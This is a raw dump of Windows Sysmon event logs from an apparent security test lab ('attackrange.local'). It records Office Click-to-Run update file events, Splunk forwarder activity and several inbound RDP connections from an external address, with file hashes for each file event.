23542300x800000000000000070247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONMAINW32.DLLMD5=20299C2572970A6E7E27C34ED161B1BB,SHA256=A2079A843E16B5948E612BAD6253B4DD713A743390CE348703D607B21E13C84C,IMPHASH=4D744B5D9009C714221900D4BD657526truetrue 23542300x800000000000000049781Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:34.491{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21651E3C012280C9CAFB7200E48BD204,SHA256=FAFDB5A3D3891DB14564EDC22AD6A311ED03DA2F7F02F020AF78F21570B488F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049780Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:34.007{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=081C530073B24AF37B04D428FB8381B0,SHA256=AB9A2B2094591CDA38385FB9ABC5DE9DF3B4B35CA85A8653B535451DA85A8CE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\react-native-sdk.dllMD5=A494A55DEACB5B29F6C4AC596009FF53,SHA256=C761602052931A7439D9DB5D154121A82CD9E97694160CB2FDDD453B68F14E94,IMPHASH=45FE36BA724F7BF7E592B1DB7734E818truetrue 23542300x800000000000000070305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\rdpqoemetrics.dllMD5=63F2A363231A9299594443EAFE93B6D0,SHA256=4B9F81A9E18897841B20F347B3EEB909B675858171435D4FAEEBCBE969A28368,IMPHASH=A92835BE0C914FAA6FD9AFA77B9DFE92truetrue 23542300x800000000000000070304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBTRAP.DLLMD5=5E98D3B1597157F7823FE263798CEA60,SHA256=1DEC7557365836FC123A1A4391677D97BC6E1FA2BB8E2CA664D13AD3C22EF5E2,IMPHASH=B6304C9856A85A40034CB8B8C34C0C1Atruetrue 23542300x800000000000000070303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBCONV.DLLMD5=252B1B3CAD1023CA60B57B16CCF65B5A,SHA256=80D0784A051FC7BCF2306EB848F7750BCA96613E70FBF05B7E995B3A4B164321,IMPHASH=BC66B468C591FF11A07C1A2066631432truetrue 23542300x800000000000000070302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUB6INTL.COMMON.DLLMD5=68413BCB363B2FA463F7D5F878E280CC,SHA256=863762A93859BD8DB644235A60A96319C8704327974276D1AF671A8218BFFF5F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PTXT9.DLLMD5=F1D100B4143845FC6FFEC7F488746EF1,SHA256=BB4F329F8AA57A0CC575C0E16D1C80A0C94E83F2C867D5C11BBE95D88BBE1888,IMPHASH=382C308EE3A8685693482520B0BC005Etruetrue 23542300x800000000000000070300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PSTPRX32.DLLMD5=FF9F09FAA68524843B85AA52A892CF74,SHA256=FF605E717C25114E1E28141AA754CFA541C0E3CFFDA8C83AE8DCC0ED1B040FB6,IMPHASH=F8300A5CB5194F3F3093854D35A48521truetrue 23542300x800000000000000070299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.860{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=507E6C4533414DC635755F8BFBCD5ABE,SHA256=130649BC8940794387FFCAAFF5A280147872AD24E26E3486972A9365DE1A4B0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Psom.dllMD5=7930B75CB06230445486247AEB57C94E,SHA256=C472F95583C7C144A5170EB91E2E7BEE97E0FB3C5418FB3A0118727F89B0ACED,IMPHASH=48260987B639A1B62DACFB1BE65B4B25truetrue 23542300x800000000000000070297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PRTF9.DLLMD5=C640D863DFE287E2DB312D4EFCB4FEA9,SHA256=82A4DCE74A09457DFE7901A2CE9F859EB567BFF82FB6C8B1F152A714DB6F7BB1,IMPHASH=26EE7341C6E85A358D5485DB84F7D099truetrue 23542300x800000000000000070296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\protocolhandler.exeMD5=3ABF29BA04A8B568D2E1131671AA5E55,SHA256=2681C1E0868D998D27CCBF8632B32A03516C2D2077B9D58E79C197D802763A42,IMPHASH=7CA1A7201F353458919632EB09395241truetrue 23542300x800000000000000070295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PropertyModelProxy.dllMD5=457D5D722E19DF723C255C3BF9DB203D,SHA256=2E5839F5D37D1FEE26A31DDEA11ABCCDADE32F7AB1881B4F62EFE622B1B3E978,IMPHASH=4ACC4EB4E9E42D7B4FA63EC0325646E5truetrue 23542300x800000000000000070294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PropertyModel.dllMD5=49801488F3618B59AA22B5F3065779CC,SHA256=FC126E507FB301661E3D59C21DEB2C3023CE2FA686E8B92CB37671ECCB751CFC,IMPHASH=BD5DF9384673A0CA126A8501521E16AAtruetrue 23542300x800000000000000070293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PPTICO.EXEMD5=DE8CCFD688FC167672FE1064FE83A775,SHA256=65D952566CB7E32C9DF129EFD102995586E2C1E6A27D98AA1AE564D390C9B7C1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PPSLAX.DLLMD5=C101F0855A7A4CD7ADB38AAB8F375EEB,SHA256=D159CF7AED511BD098706AB801B284F783DC49272E5A421865005123F67A5BE5,IMPHASH=0318E6EEC6435C89C4CF37361CEB4863truetrue 23542300x800000000000000070291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PPRESOURCES.DLLMD5=4131C7766E9E5100BA6F7C077A44E90D,SHA256=F1756CA7CAB8961A1D1A5C820DC4176CBE1D703FB308057E19DFD7834F711B64,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PPINTL.COMMON.DLLMD5=54AF0CD1EC1BE3CE5A844479ADC7E675,SHA256=751474411A7F9C2B549A45FD12B6611CCF77A85D9EFC7DAB8593B0F6EE487DDD,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000070289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.247{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-41323-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000070288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.177{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-44053-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PPCORE.DLLMD5=29A69D2215AFEC857CCFE251E1758E51,SHA256=D9ACD7EF9B862624FA4E7D543B414ADAB4BB290A272608D4B6826B64FCF4FF3A,IMPHASH=301435E1AE4F98CDC06A995FAFFFF72Btruetrue 23542300x800000000000000070286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PowerPointInterProviderRanker.binMD5=A8E112A3551CFD6380BDC0550A2C87C3,SHA256=F27EC364E94D5929D699F51AD4576ADFB90644926468497A045824D58307E55E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PowerPointCombinedFloatieModel.onnxMD5=8F7BD62417E3B3F84A9715F1FA392EDE,SHA256=4FEF1351CC3A1CEC22DF548BB903B7F4AFC486881ECC21CA9ED31A929E0ABEF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PowerPointCombinedFloatieModel.binMD5=F27089C0E936852D273873C9F82934C1,SHA256=B55CD63E69B92ACDA46744D9ACEAA7E8D94E78074866D249284776103A0B9426,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\POWERPNT.VisualElementsManifest.xmlMD5=9074C9F21A562F6D80E175CDEC8542F4,SHA256=230ECA32CD0DDD07320401605B32693E59BD38ED880352D0A97F05305BE1A9DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\powerpnt.exe.manifestMD5=A09C7C1C3818559B82276D3734392B97,SHA256=519D68CA62D3D385C2248A960E6524F78617D80E3EFD8713233B00952D176A4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\POWERPNT.EXEMD5=8360E80A7405C09596EC63B94E801216,SHA256=9AC7BDE91B31367EDDB57629E8D87C3AD87107C520A03AA25735374BC6494FBB,IMPHASH=5DB7D8EEBE8F06F450AAFCA16D7FB09Dtruetrue 23542300x800000000000000070280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\pkeyconfig-office.xrm-msMD5=0BF7335CBB575B762C212C30F8932387,SHA256=B203912EE7F7E2DF69D79D5CE29DB4A3DF0A185598986259AC849A39A56F715D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PerfBoost.exeMD5=990303168A026E52456274940599564F,SHA256=5C33F08D79E0ACA4A0E06D62E7F4A5E197D17D5FA7BE5CBBEE83AED3AE21CCB4,IMPHASH=10E0EC2195610F1EC70A6A891BE5124Ftruetrue 23542300x800000000000000070278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PEOPLEDATAHANDLER.DLLMD5=B6C89F2526A281F8863AE2CC1669F022,SHA256=E453E84F566FDB5DF66BB12BA7A9B6413ACF91B605D351FBAE2C1341EA7CB71A,IMPHASH=85608D5217818D4487106C54C214B43Etruetrue 23542300x800000000000000070277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PDFREFLOW.EXEMD5=9AB7A327D3AE446643D97272F121DD36,SHA256=577B0EE1F3D79EC51368CECA1BB18A30F8A20AF903803224F55B716524FEBC95,IMPHASH=A7089A8E7E323D9DC748A33FD627F863truetrue 23542300x800000000000000070276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OWSSUPP.DLLMD5=569C2F3148DB311D9BD9ED03A0088C19,SHA256=A97B3B80D61D721EA94D834384FF26EB9D672C9778322480FA06DF4652C974F4,IMPHASH=6B1CC2132E47060FE7157CC2B6366804truetrue 23542300x800000000000000070275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLVBS.DLLMD5=0F742ECE8353DD7D606ABC861A4ED23B,SHA256=6CC519291E4AD7607306A5F47EDED5B763B476940BF3ABF0B33030842FCD467A,IMPHASH=3048EA542ECF82EC2F04B49B2179AAAEtruetrue 23542300x800000000000000070274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLRPC.DLLMD5=F897D553A9508F20AB0C2B93B42D07B2,SHA256=4F2F45FECDB650713ABC7E9C253136D39F15702B695B3C0842DCD26D4BEFA030,IMPHASH=D24D96F50868080C869640C95376F0CBtruetrue 23542300x800000000000000070273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLPH.DLLMD5=4D922935D5E3657809F708D3503A89B0,SHA256=E1BBE057451A86332F3FBC3E5E7F9AF584E2B201CAC9C7D60E0F49E46F95D67E,IMPHASH=1C777F21DD66DE0510D56034BFD5EB57truetrue 23542300x800000000000000070272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookWebHost.dllMD5=187A70476D754256D1716E00DB0246E2,SHA256=0AFADA4825DBC643434E89692ABB4B85C0FC2C39AF2633C3490EBFF8547A03EF,IMPHASH=2D6CDE9D13DFB3CA9FAAF53932F37680truetrue 23542300x800000000000000070271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookServicing.DLLMD5=1124BBC1765859A6A0EE827D5904F5E9,SHA256=3E0152FF913C23A6F7514C3379386FFF5050E43D02964848EE90DE3F2EB3E115,IMPHASH=9D6326B3B7CA96FF65041B5BBAE74B0Etruetrue 23542300x800000000000000070270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookExplorerTellMeZeroTermCommandModel.binMD5=BC69E97B040E2D43CB7328E66B135CE3,SHA256=ACBB3C8379F89A604A0CD52E4DE1522B82252B434658555C39F334927C62A57E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLOOK.VisualElementsManifest.xmlMD5=82A597049B38DB14792776F86CB9FB34,SHA256=65FAE90767A1F4CD771552C73A5907CFB71C03A02B5B57A9CDE4505986D5E896,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLOOK.EXE.MANIFESTMD5=138AB9862AA6AB96A5C49A2E2E3243A1,SHA256=5821E8D34ECBFA9BCE6213D7ACF6C2DC43A80F7E6B29C5CFABD93F3CE7A15E90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:35.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLOOK.EXEMD5=6CBF735686C8927EDD817DEEF5673CA5,SHA256=C25A3178F48D90C02817DA12923D994CFF78F424F412A8DCF9CFA867522C84C2,IMPHASH=EF142C08EA9F3E04D60833DF64BB2EA2truetrue 354300x800000000000000049785Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:33.612{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52790-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049784Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:33.500{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49826-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049783Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:32.046{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51304-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049782Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:35.023{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C1FEBDD66FC1F2D9B56290C52B7841B,SHA256=2750792E6A9794982EAF81DD05F8BF34E798C15D4598A280EB837FD0CA9BA43F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 